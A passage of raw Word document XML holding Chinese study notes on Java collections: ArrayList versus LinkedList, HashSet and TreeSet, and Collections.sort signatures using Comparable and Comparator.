          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00903CE4" w:rsidRPr="00F41A4C" w:rsidRDefault="00903CE4" w:rsidP="00903CE4">
      <w:pPr>
        <w:ind w:firstLineChars="250" w:firstLine="525"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最重要的特点是次序，维护元素的特定顺序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1F53" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1F53" w:rsidP="006F1F53">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：数组形式保存对象，对象连续的位置中，插入删除比较麻烦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1F53" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1F53" w:rsidP="006F1F53">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查找速度快</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1F53" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1F53" w:rsidP="006F1F53">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>采用双向链表实现存储，每个对象存储在独立的空间中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1F53" w:rsidRPr="00F41A4C" w:rsidRDefault="006F1F53" w:rsidP="006F1F53">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLineChars="250" w:firstLine="550"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查找相对慢，删除和新增比较占优势</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5728" w:rsidRPr="00F41A4C" w:rsidRDefault="008B5728" w:rsidP="008B5728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(2)Set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5728" w:rsidRPr="00F41A4C" w:rsidRDefault="008B5728" w:rsidP="008B5728">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每个元素唯一，</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不保证元素次序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。加入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>必须定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252792" w:rsidRPr="00F41A4C" w:rsidRDefault="00252792" w:rsidP="008B5728">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidR="001F6434" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001F6434" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F6434" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用散列函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252792" w:rsidRPr="00F41A4C" w:rsidRDefault="00252792" w:rsidP="008B5728">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidR="001F6434" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：红黑树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052C3F" w:rsidRPr="00F41A4C" w:rsidRDefault="00052C3F" w:rsidP="008B5728">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LinkedHashSet</w:t>
      </w:r>
      <w:r w:rsidR="00DB0ED7" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE74CC" w:rsidRPr="00F41A4C" w:rsidRDefault="0087699E" w:rsidP="00FE74CC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FE74CC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B331EB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Collections</w:t>
      </w:r>
      <w:r w:rsidR="00B331EB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对象比较</w:t>
      </w:r>
      <w:r w:rsidR="00887495">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00887495" w:rsidRPr="00887495">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00887495" w:rsidRPr="00887495">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparable </w:t>
      </w:r>
      <w:r w:rsidR="00887495" w:rsidRPr="00887495">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00887495" w:rsidRPr="00887495">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Comaprator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0C83" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;T </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparable&lt;? </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> T&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve">(List&lt;T&gt; </w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidR="000F0C83" w:rsidRPr="000F0C83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F4FF3" w:rsidRPr="005F4FF3" w:rsidRDefault="005F4FF3" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;T&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve">(List&lt;T&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve">, Comparator&lt;? </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> T&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A3E3E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4FF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F0C83" w:rsidRDefault="000F0C83" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
